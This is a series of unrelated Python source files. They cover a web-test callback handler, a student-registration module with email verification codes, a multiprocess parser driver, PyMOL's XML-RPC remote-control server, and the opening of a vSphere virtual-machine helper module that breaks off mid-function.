conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
user.py
|
'''test
用于引用utils.py中的函数
'''
import sys
import os
sys.path.append('./../')
from tools import utils
from db import db_helper, app, model_repr
from threading import Timer, Thread, Lock
import time
import collections
import sched
codes = collections.OrderedDict()
s = sched.scheduler(time.time, time.sleep) # 用来定时删除过期验证码的调度器
scheduler_lock = Lock()
is_scheduler_running = False # 判定调度器是否正在运行
# 测试场合
# time_limit = 60 * 0.2
# 实际场合
time_limit = 60 * 5
def register_(email, password, student_id, sex, collage, grade, name, validate_code):
res = {}
if(email not in codes):
res = {'error': 1, 'error_message': '未获取验证码或验证码过期'}
elif(codes[email][0] != validate_code):
res = {'error': 1, 'error_message': '验证码错误'}
else:
'''
判断邮箱是否被注册
'''
error_code, error_message, openid = db_helper.sign_up_true(email, password, student_id, sex, collage, grade, name)
if(error_code == 0):
try:
codes.pop(email)
except Exception as e:
print('Error:', e)
res = {'error': str(error_code), 'error_message': error_message, 'data': {'openid': str(openid)}}
else:
res = {'error': str(error_code), 'error_message': error_message, 'data': {'openid': str(openid)}}
return str(res)
def get_verification_code_(email):
'''
通过邮箱获取验证码,
验证码在一定时间内有效,超过这个期限则会自动删除
'''
global is_scheduler_running
res = {}
# 验证码还未过期的情况
if(email in codes):
res = {'error': 1, 'error_message': '原验证码未过期'}
print(str(res))
# 正常情况
else:
'''
# 测试生成验证码(不发送邮件)
# code = utils.generate_verification_code()
发送邮件并生成验证码
code = utils.send_email(rcptto=email)
'''
# code = '11111' # 生成验证码并发送至邮箱
code = utils.send_email(rcptto=email)
if code == -1:
return str({'error': 1, 'error_message': '验证码发送失败'})
codes[email] = (code, time.time()) # 在本地记录验证码值
print('生成的验证码', codes[email])
# print(is_scheduler_running)
if(not is_scheduler_running): # 若调度器不在运行
enter_event_and_run_scheduler()
res = {'error': 0, 'error_message': '验证码已发送'}
return str(res)
def delete_invalid_codes():
'''
删除本地保存的过期(无效)的验证码。
OrderedDict按照插入的顺序排序,所以先创建验证码的一定在前面,从前面遍历删除直至遇到未过期的验证码为止
'''
global is_scheduler_running
for k in list(codes):
if(time.time() - codes[k][1] < time_limit):
break
if(k in codes):
try:
print('删除的验证码:', codes.pop(k))
except Exception as e:
print('Error:', e)
if(len(codes) > 0 and s.empty()): # 若还有验证码,且调度队列为空,则继续将delete_invalid_codes加入调度器
s.enter(time_limit, 0, delete_invalid_codes)
else:
is_scheduler_running = False
if(len(codes) > 0 and not is_scheduler_running): # 应对线程安全,此时可能有验证码加入,但调度器并未开启
enter_event_and_run_scheduler()
def enter_event_and_run_scheduler():
scheduler_lock.acquire()
global is_scheduler_running
if(not is_scheduler_running):
is_scheduler_running = True
if(s.empty()):
s.enter(2, 0, delete_invalid_codes)
t = Thread(target = s.run)
t.start()
scheduler_lock.release()
def update_(form):
'''更新用户信息
可以传递的属性有password/student_id/sex/collage/grade/name/edu_bg/signature
input:
openid
attrs
(old_password:)
output:
error
data:
msg: 旧密码错误/修改成功/修改异常/ 不存在该学生/组织 / 邮箱不可修改
'''
openid = int(form['openid'])
success = True
msg = "更改成功"
for item in form.items():
if(item[0] == 'openid' or item[0] == 'old_password'):
continue
if(item[0] == 'password'):
target = db_helper.query_student(openid) if openid >= app.config['SPLIT_STU_ORG'] else db_helper.query_oraganization(openid)
if target == None:
return str({'error': 1, "data": {'msg': '不存在该学生或组织'}})
if('old_password' not in form):
return str({"error": 1, "data": {"msg": '请输入旧密码'}})
if target.password == form['old_password']:
success, msg = db_helper.update_student_or_organization(openid, item[0], item[1])
if(not success):
return str({"error": 1, "data": {"msg": msg}})
else:
return str({'error': 1, "data": {'msg': '旧密码错误'}})
else:
success, msg = db_helper.update_student_or_organization(openid, item[0], item[1])
if(not success):
return str({"error": 1, "data": {"msg": msg}})
return str({"error": 0, "data": {"msg": "更改成功"}})
# def printf():
# print(s.empty())
# print('test')
# print(s.empty())
# test
'''
if __name__ == '__main__':
enter_event_and_run_scheduler()
s.enter(time_limit, 0, printf)
print(s.empty())
s.run()
print(s.empty())
# 测试获取、保存、删除验证码
# time_limit = 60 * 0.1
get_verification_code_('11.qq.com')
get_verification_code_('11.qq.com') # 测试原验证码未过期
# 删除时没有过期的验证码的情况
delete_invalid_codes()
print('ok1')
time.sleep(5)
delete_invalid_codes()
print('ok2')
# 删除过期验证码的情况
time.sleep(2)
delete_invalid_codes()
print('ok3')
# 获取新的
get_verification_code_('2')
print(codes)
# 输出结果:
# 生成的验证码 ('11111', 1559045170.948554)
# {'error': 1, 'data': {'msg': '原验证码未过期'}}
# ok1
# ok2
# 删除的验证码: ('11111', 1559045170.948554)
# ok3
# 生成的验证码 ('11111', 1559045177.9637892)
# OrderedDict([('2', ('11111', 1559045177.9637892))])
'''
|
multiprocessed_parsing.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright © 2010-2011 University of Zürich
# Author: Rico Sennrich <sennrich@cl.uzh.ch>
# Implements multiprocessed parsing
from __future__ import unicode_literals
import sys
import os
import time
import multiprocessing
import codecs
from subprocess import Popen, PIPE
class Parser(multiprocessing.Process):
def __init__(self, task_queue, result_dict,commandlist,commandpath,error_signal):
multiprocessing.Process.__init__(self)
self.task_queue = task_queue
self.result_dict = result_dict
self.parsing = Popen(commandlist,cwd=commandpath, stdin=PIPE, stdout=PIPE)
self.error_signal = error_signal
def run(self):
while True:
index,next_task = self.task_queue.get()
if next_task is None:
# Poison pill in task queue
self.parsing.terminate()
break
self.parsing.stdin.write(next_task)
self.parsing.stdin.flush()
answer = ''
while True:
outline = self.parsing.stdout.readline().decode("UTF-8")
#if we ever reach the end of parsing.stdout, this indicates that the parser process has crashed
if not outline:
sys.stderr.write("Parser process {0} has crashed on sentence {1}. If you don't see swipl error message, try parsing sentence in single-processed mode (option -p 1).\n".format(self.parsing.pid,index+1))
self.error_signal.value = 1
self.parsing.terminate()
return
answer += outline
#This signals that parser has finished with the sentence and can begin with the next one
if outline == '%%END_OF_SENTENCE\n':
break
self.result_dict[index] = answer
return
#Segments input into sentences and sends them to tasks queue
def segment_sent(inpipe,tasks,num_parsers,sentdelim,todo):
i = 0
msg = b''
for line in inpipe:
msg += line
#sentdelim signals end of sentence; sentence is sent to queue as single job
if b'_' + sentdelim + b"']," in line:
todo.value = i+2 # this ensures that number of finished task never equals todo
tasks.put((i,msg + b'\n'))
i += 1
msg = b''
# Add a poison pill for each parser
for i in range(num_parsers):
tasks.put((None,None))
# After this point, allow process to finish if all tasks are done
todo.value -= 1
#Results from all processes are written to shared dictionary
#this function writes the results and clears memory as soon as possible
def generate_output(results,todo,outpipe,error_signal):
i = 0
#This is only False if all sentences have been parsed or swipl crashed
while i < todo.value and not error_signal.value:
try:
result = results[i]
outpipe.write(result)
del(results[i])
i += 1
except KeyError:
time.sleep(0.1)
if error_signal.value:
break
outpipe.close
#Segments sentences, parses them using num_parsers parallel processes, and combines output of all parser processes
def main(inpipe,outpipe,num_parsers,sentdelim,commandlist,commandpath):
# Establish process communication protocols
tasks = multiprocessing.Queue(num_parsers+1) #sends tasks from segment_sent to parser
manager = multiprocessing.Manager()
results = manager.dict()
todo = manager.Value('i',1)
error_signal = manager.Value('i',0)
# Start parsers
parsers = [ Parser(tasks, results,commandlist,commandpath,error_signal)
for i in range(num_parsers) ]
for w in parsers:
w.start()
#enqueue sentences to parse
p = multiprocessing.Process(target=segment_sent, args=(inpipe,tasks,num_parsers,sentdelim,todo))
p.start()
generate_output(results,todo,outpipe,error_signal)
#prevent hangup when all parser processes crash (which hopefully never happens)
for parser in parsers:
parser.terminate()
p.terminate()
if __name__ == "__main__":
if sys.version_info < (3, 0):
sys.stdout = codecs.getwriter('UTF-8')(sys.stdout)
sys.stderr = codecs.getwriter('UTF-8')(sys.stderr)
sys.stdin = codecs.getreader('UTF-8')(sys.stdin)
#hack to relay stdin to new multiprocessing.Process
init_pipe = Popen(["cat"], stdin=sys.stdin,stdout=PIPE)
try:
num_parsers = int(sys.argv[1])
except:
num_parsers = 2
args = sys.argv[2]
if sys.version_info < (3, 0):
sentdelim = bytes(sys.argv[3])
else:
sentdelim = bytes(sys.argv[3], encoding="UTF-8")
path = sys.argv[4]
prolog = sys.argv[5]
prolog_load = sys.argv[6]
runCMD = [prolog, '-q', prolog_load, 'ParZu-parser.pl', '-g', args]
if prolog.endswith('swipl'):
runCMD += ['-t', 'halt.','-G248M', '-L248M']
main(init_pipe.stdout,sys.stdout,num_parsers,sentdelim,runCMD,path)
|
rpc.py
|
""" an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate$
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev$
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd,cgo
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
""" Used to establish whether or not the server is alive.
This is a good thing to call after establishing a connection just to
make sure that everything is ok.
Returns 1
"""
return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
""" create a text label
Arguments:
pos: a 3 tuple with the position of the label
text: a string with the label
color: a 3 tuple with the color of the label. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
NOTE:
at the moment this is, how you say, a hack
"""
cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
cmd.set_color("%s-color"%id,color)
cmd.color("%s-color"%id,id)
return 1
def rpcResetCGO(id):
""" removes a CGO from the local dictionary
"""
global cgoDict
if id=="*":
cgoDict={}
res = 1
elif id in cgoDict:
del(cgoDict[id])
res = 1
else:
res = 0
return res
def rpcSphere(pos,rad,color,id='cgo',extend=1,
transparent=0,transparency=0.5):
""" create a sphere
Arguments:
pos: a 3 tuple with the position of the sphere
rad: a float with the radius
color: a 3 tuple with the color of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
"""
r,g,b = color
x,y,z = pos
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
""" renders a CGO vector
Arguments:
cgoV: a vector of floats
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
obj.extend(cgoV)
cmd.load_cgo(obj,id,1)
return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
""" create a sphere
Arguments:
sphereD: a series of (pos,rad,color,transparent,transparency) tuples
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
for pos,rad,color,transparent,transparency in sphereD:
r,g,b = color
x,y,z = pos
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
transparent=0,transparency=0.5):
""" create a cylinder
Arguments:
end1: a 3 tuple with the position of end1 of the sphere
end2: a 3 tuple with the position of end1 of the sphere
rad: a float with the radius
color1: a 3 tuple with the color of end1 of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
color2: (OPTIONAL) a 3 tuple with the color of end2 of the sphere. (1,1,1)
is white
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
NOTE: the reason that color2 follows id is that I think clients are
going to be interested in setting the id more often than they are going
to care about the second color.
"""
global cgoDict
if color2 is None: color2 = color1
r1,g1,b1 = color1
r2,g2,b2 = color2
x1,y1,z1 = end1
x2,y2,z2 = end2
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcDeleteObject(objName):
""" deletes an object """
try:
cmd.delete(objName)
except:
res = 0
else:
res = 1
return res
def rpcDeleteAll():
""" deletes all objects """
res = cmd.delete('all')
if res is not None:
return res
else:
return ''
def colorObj(objName,colorScheme):
""" sets an molecule's color scheme
Arguments:
- objName: the object (molecule) to change
- colorScheme: name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
"""
if colorScheme:
if colorScheme == 'std':
# this is an adaptation of the cbag scheme from util.py, but
# with a gray carbon.
cmd.color("magenta","("+objName+")",quiet=1)
cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
cmd.color("gray","(elem C and "+objName+")",quiet=1)
elif hasattr(utils,colorScheme):
fn = getattr(utils,colorScheme)
fn(objName,quiet=1)
res = 1
else:
res = 0
return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
""" loads a molecule from a pdb string
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_pdbstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
""" loads a molecule from a mol block
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_molstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
""" loads an object from a file
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
colorScheme: (OPTIONAL) name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
if not objName:
objName = fileName.split('.')[0]
if replace:
cmd.delete(objName)
res = cmd.load(fileName,objName,format=format)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadSurface(fileName,objName,format='',surfaceLevel=1.0):
""" loads surface data from a file and adds an isosurface
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
if not objName:
objName = fileName.split('.')[0]
gridName = 'grid-%s'%objName
res = cmd.load(fileName,gridName,format='')
cmd.isosurface(objName,gridName,level=surfaceLevel)
if res is not None:
return res
else:
return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
""" loads surface data from a string and adds an isosurface
Arguments:
data: the data to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
gridName = 'grid-%s'%objName
# it would be nice if we didn't have to go by way of the temporary file,
# but at the moment pymol will only read shapes from files
tempnm = tempfile.mktemp('.grd')
open(tempnm,'w+').write(data)
res = rpcLoadSurface(tempnm,objName,format='',surfaceLevel=surfaceLevel)
os.unlink(tempnm)
if res is not None:
return res
else:
return ''
def rpcRotate(vect,objName='',state=-1):
""" rotates objects
Arguments:
- vect: a sequence with x y and z rotations
- objName: (OPTIONAL) object to be rotated
- state: (OPTIONAL) if zero only visible states are rotated,
if -1 (the default), all states are rotated
"""
cmd.rotate('x',vect[0],objName,state=state)
cmd.rotate('y',vect[1],objName,state=state)
cmd.rotate('z',vect[2],objName,state=state)
return 1
def rpcGetNames(what='selections',enabledOnly=1):
""" returns the results of cmd.get_names(what) """
return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
""" returns the results of cmd.id_atom(what) """
return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
""" returns the results of cmd.get_atom_coords(what,state) """
return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
""" returns general help text or help on a particular command """
global serv
res = 'Command Not Found'
if not what:
res = list(serv.funcs.keys())
else:
funcs = serv.funcs
if what in funcs:
fn = funcs[what]
res = "Function: %s("%what
defs = fn.__defaults__
if defs:
code = fn.__code__
nDefs = len(defs)
args = []
i = -1
for i in range(code.co_argcount - nDefs):
args.append(code.co_varnames[i])
for j in range(nDefs):
vName = code.co_varnames[j+i+1]
args.append("%s=%s"%(vName,repr(defs[j])))
res += ','.join(args)
res += ')\n'
if fn.__doc__:
res += fn.__doc__
return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
""" launches the xmlrpc server into a separate thread
Arguments:
hostname: (OPTIONAL) name of the host for the server
(defaults to be the name of the localhost)
port: (OPTIONAL) the first port to try for the server
nToTry: (OPTIONAL) the number of possible ports to try
(in case the first can't be opened)
"""
if not hostname:
import os
hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
global cgoDict,serv
cgoDict = {}
for i in range(nToTry):
try:
serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
allow_none=True)
except:
serv = None
else:
break
if serv:
print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
# import PyMOL API
from pymol import api
serv.register_instance(cmd)
# legacy stuff with unique names
serv.register_function(rpcPing,'ping')
serv.register_function(rpcResetCGO,'resetCGO')
serv.register_function(rpcRenderCGO,'renderCGO')
serv.register_function(rpcSphere,'sphere')
serv.register_function(rpcSpheres,'spheres')
serv.register_function(rpcCylinder,'cylinder')
serv.register_function(rpcDeleteObject,'deleteObject')
serv.register_function(rpcDeleteAll,'deleteAll')
serv.register_function(rpcLoadPDB,'loadPDB')
serv.register_function(rpcLoadMolBlock,'loadMolBlock')
serv.register_function(rpcLoadSurface,'loadSurface')
serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
serv.register_function(rpcLoadFile,'loadFile')
serv.register_function(rpcGetNames,'getNames')
serv.register_function(api.count_atoms,'countAtoms')
serv.register_function(rpcIdAtom,'idAtom')
serv.register_function(rpcHelp,'help')
serv.register_function(rpcGetAtomCoords,'getAtomCoords')
# legacy stuff, should be removed because overwrites API names!
serv.register_function(rpcLabel,'label') # pseudoatom
serv.register_function(rpcRotate,'rotate')
serv.register_introspection_functions()
t = threading.Thread(target=serv.serve_forever)
t.setDaemon(1)
t.start()
else:
print('xml-rpc server could not be started')
# vi:expandtab:smarttab:sw=2
|
__init__.py
|
#!/usr/bin/python
import base64
from binascii import hexlify
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from distutils.spawn import find_executable
from kvirt import common
from kvirt.common import error, pprint, warning
from kvirt.defaults import UBUNTUS, METADATA_FIELDS
from math import ceil
from pyVmomi import vim, vmodl
from pyVim import connect
import json
import os
import re
import requests
import random
from ssl import _create_unverified_context, get_server_certificate
import tarfile
from tempfile import TemporaryDirectory
from threading import Thread
import time
import pyVmomi
import webbrowser
from zipfile import ZipFile
def waitForMe(t):
while t.info.state not in [vim.TaskInfo.State.success, vim.TaskInfo.State.error]:
time.sleep(1)
if t.info.state == vim.TaskInfo.State.error:
error(t.info.description)
error(t.info.error)
os._exit(1)
def collectproperties(si, view, objtype, pathset=None, includemors=False):
collector = si.content.propertyCollector
# Create object specification to define the starting point of
# inventory navigation
objspec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
objspec.obj = view
objspec.skip = True
# Create a traversal specification to identify the path for collection
traversalspec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
traversalspec.name = 'traverseEntities'
traversalspec.path = 'view'
traversalspec.skip = False
traversalspec.type = view.__class__
objspec.selectSet = [traversalspec]
# Identify the properties to the retrieved
propertyspec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
propertyspec.type = objtype
if not pathset:
propertyspec.all = True
propertyspec.pathSet = pathset
# Add the object and property specification to the
# property filter specification
filterspec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
filterspec.objectSet = [objspec]
filterspec.propSet = [propertyspec]
# Retrieve properties
props = collector.RetrieveContents([filterspec])
data = []
for obj in props:
properties = {}
for prop in obj.propSet:
properties[prop.name] = prop.val
if includemors:
properties['obj'] = obj.obj
data.append(properties)
return data
def find(si, folder, vimtype, name):
o = si.content.viewManager.CreateContainerView(folder, [vimtype], True)
view = o.view
o.Destroy()
element = None
for e in view:
if e.name == name:
element = e
break
return element
def findvm(si, folder, name):
view = si.content.viewManager.CreateContainerView(folder, [vim.VirtualMachine], True)
vmlist = collectproperties(si, view=view, objtype=vim.VirtualMachine, pathset=['name'], includemors=True)
vm = list(filter(lambda v: v['name'] == name, vmlist))
if len(vm) >= 1:
return vm[-1]['obj']
else:
return None
def convert(octets, GB=True):
# return str(float(octets) / 1024 / 1024 / 1024) + "GB"
result = str(ceil(float(octets) / 1024 / 1024 / 1024))
if GB:
result += "GB"
return result
def dssize(ds):
di = ds.summary
return convert(di.capacity), convert(di.freeSpace)
def makecuspec(name, nets=[], gateway=None, dns=None, domain=None):
customspec = vim.vm.customization.Specification()
ident = vim.vm.customization.LinuxPrep()
ident.hostName = vim.vm.customization.FixedName()
ident.hostName.name = name
globalip = vim.vm.customization.GlobalIPSettings()
if domain:
ident.domain = domain
customspec.identity = ident
if dns is not None or domain is not None:
if dns is not None:
globalip.dnsServerList = [dns]
# if dns2:
# globalip.dnsServerList.append(dns2)
if domain is not None:
globalip.dnsSuffixList = domain
customspec.globalIPSettings = globalip
adaptermaps = []
for index, net in enumerate(nets):
if isinstance(net, str) or (len(net) == 1 and 'name' in net):
if index == 0:
continue
# nicname = "eth%d" % index
ip = None
netmask = None
# noconf = None
# vips = []
elif isinstance(net, dict):
# nicname = net.get('nic', "eth%d" % index)
ip = net.get('ip')
netmask = next((e for e in [net.get('mask'), net.get('netmask')] if e is not None), None)
# noconf = net.get('noconf')
# vips = net.get('vips')
if ip is not None and netmask is not None and gateway is not None and domain is not None:
guestmap = vim.vm.customization.AdapterMapping()
guestmap.adapter = vim.vm.customization.IPSettings()
guestmap.adapter.ip = vim.vm.customization.FixedIp()
guestmap.adapter.ip.ipAddress = ip
guestmap.adapter.subnetMask = netmask
guestmap.adapter.gateway = gateway
guestmap.adapter.dnsDomain = domain
adaptermaps.append(guestmap)
customspec.nicSettingMap = adaptermaps
return customspec
def createnicspec(nicname, netname, nictype=None):
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
if nictype == 'pcnet32':
nic = vim.vm.device.VirtualPCNet32()
elif nictype == 'e1000':
nic = vim.vm.device.VirtualE1000()
elif nictype == 'e1000e':
nic = vim.vm.device.VirtualE1000e()
else:
nic = vim.vm.device.VirtualVmxnet3()
desc = vim.Description()
desc.label = nicname
nicbacking = vim.vm.device.VirtualEthernetCard.NetworkBackingInfo()
desc.summary = netname
nicbacking.deviceName = netname
nic.backing = nicbacking
# nic.key = 0
nic.deviceInfo = desc
nic.addressType = 'generated'
nicspec.device = nic
return nicspec
def createdvsnicspec(nicname, netname, switchuuid, portgroupkey, nictype=None):
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
if nictype == 'pcnet32':
nic = vim.vm.device.VirtualPCNet32()
elif nictype == 'e1000':
nic = vim.vm.device.VirtualE1000()
elif nictype == 'e1000e':
nic = vim.vm.device.VirtualE1000e()
else:
nic = vim.vm.device.VirtualVmxnet3()
dnicbacking = vim.vm.device.VirtualEthernetCard.DistributedVirtualPortBackingInfo()
dvconnection = vim.dvs.DistributedVirtualSwitchPortConnection()
dvconnection.switchUuid = switchuuid
dvconnection.portgroupKey = portgroupkey
dnicbacking.port = dvconnection
nic.backing = dnicbacking
nicspec.device = nic
return nicspec
def createscsispec():
ckey = 1000
# SCSISPEC
scsispec = vim.vm.device.VirtualDeviceSpec()
scsispec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
# scsictrl = vim.vm.device.VirtualLsiLogicController()
scsictrl = vim.vm.device.ParaVirtualSCSIController()
scsictrl.key = ckey
scsictrl.busNumber = 0
scsictrl.sharedBus = vim.vm.device.VirtualSCSIController.Sharing.noSharing
scsispec.device = scsictrl
return scsispec
def creatediskspec(number, disksize, ds, diskmode, thin=False):
ckey = 1000
diskspec = vim.vm.device.VirtualDeviceSpec()
diskspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
diskspec.fileOperation = vim.vm.device.VirtualDeviceSpec.FileOperation.create
vd = vim.vm.device.VirtualDisk()
vd.capacityInKB = disksize
diskspec.device = vd
vd.unitNumber = number
vd.controllerKey = ckey
diskfilebacking = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
filename = "[" + ds.name + "]"
diskfilebacking.fileName = filename
diskfilebacking.diskMode = diskmode
diskfilebacking.thinProvisioned = True if thin else False
vd.backing = diskfilebacking
return diskspec
def createcdspec():
# http://books.google.es/books?id=SdsnGmhF0QEC&pg=PA145&lpg=PA145&dq=VirtualCdrom%2Bspec&source=bl&ots=s8O2mw437-&sig=JpEo-AqmDV42b3fxpTcCt4xknEA&hl=es&sa=X&ei=KgGfT_DqApOy8QOl07X6Dg&redir_esc=y#v=onepage&q=VirtualCdrom%2Bspec&f=false
cdspec = vim.vm.device.VirtualDeviceSpec()
cdspec.setOperation(vim.vm.device.VirtualDeviceSpec.Operation.add)
cd = vim.vm.device.VirtualCdrom()
cdbacking = vim.vm.device.VirtualCdrom.AtapiBackingInfo()
cd.backing = cdbacking
cd.controllerKey = 201
cd.unitNumber = 0
cd.key = -1
cdspec.device = cd
return cdspec
def createisospec(iso=None):
cdspec = vim.vm.device.VirtualDeviceSpec()
cdspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
connect = vim.vm.device.VirtualDevice.ConnectInfo()
connect.startConnected = True
connect.allowGuestControl = True
connect.connected = False
cd = vim.vm.device.VirtualCdrom()
cd.connectable = connect
cdbacking = vim.vm.device.VirtualCdrom.IsoBackingInfo()
if iso is not None:
cdbacking.fileName = iso
cd.backing = cdbacking
cd.controllerKey = 201
cd.unitNumber = 0
cd.key = -1
cdspec.device = cd
return cdspec
def createclonespec(pool):
clonespec = vim.vm.CloneSpec()
relocatespec = vim.vm.RelocateSpec()
relocatespec.pool = pool
clonespec.location = relocatespec
clonespec.powerOn = False
clonespec.template = False
return clonespec
def create_filter_spec(pc, vms):
objSpecs = []
for vm in vms:
